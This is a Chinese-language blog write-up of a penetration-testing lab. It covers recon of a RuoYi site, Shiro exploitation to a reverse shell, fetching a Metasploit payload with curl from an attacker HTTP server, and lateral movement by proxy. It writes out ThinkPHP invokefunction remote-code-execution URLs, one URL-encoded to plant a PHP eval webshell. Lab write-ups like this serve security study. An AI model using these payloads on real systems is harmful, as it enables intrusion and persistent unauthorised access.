外网靶场2

信息收集

  1. cms

    发现是若依

    image-20240319231224980

web 渗透

  1. 根据信息收集获取的数据,直接使用shiro 尝试

    利群利用

    image-20240319231641262

    发现存在直接反弹shell

    image-20240319231728805

  2. 上线msf

    生成payload

    开启http服务

    image-20240319231950835

    使用curl

    1
    curl http://ip:8000/file -O

    image-20240319232226950

    执行

    image-20240319232759296

    上线成功

内网信息收集

  1. 网段信息收集

    image-20240319233740609

  2. fscan 一下

    image-20240319233941548

    image-20240319235146912

内网横向移动

  1. 搭建代理

    image-20240319235637879

    image-20240319235644403

    image-20240319235708711

    成功

  2. 172.16.60.133

    image-20240319235813086

    发现目标

  3. 开启浏览器代理

    image-20240319235907699

    访问public

    image-20240319235926119

    • rce

      1
      /index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

      image-20240320000103898

    • 写webshell

      1
      http://172.16.60.133/thinkphp/public/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%65%63%68%6f%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%5c%24%5f%50%4f%53%54%5b%63%63%63%5d%29%3b%3f%3e%22%20%3e%61%75%67%75%73%74%2e%70%68%70

      image-20240320000616080

      image-20240320003410269

      忘记了是一个windwos 的机器

      可以直接使用hta_server 尝试

      image-20240320002341209

      还可以尝试使用powershell


外网靶场2
https://tsy244.github.io/2024/03/19/靶场记录/外网靶场2/
Author
August Rosenberg
Posted on
March 19, 2024
Licensed under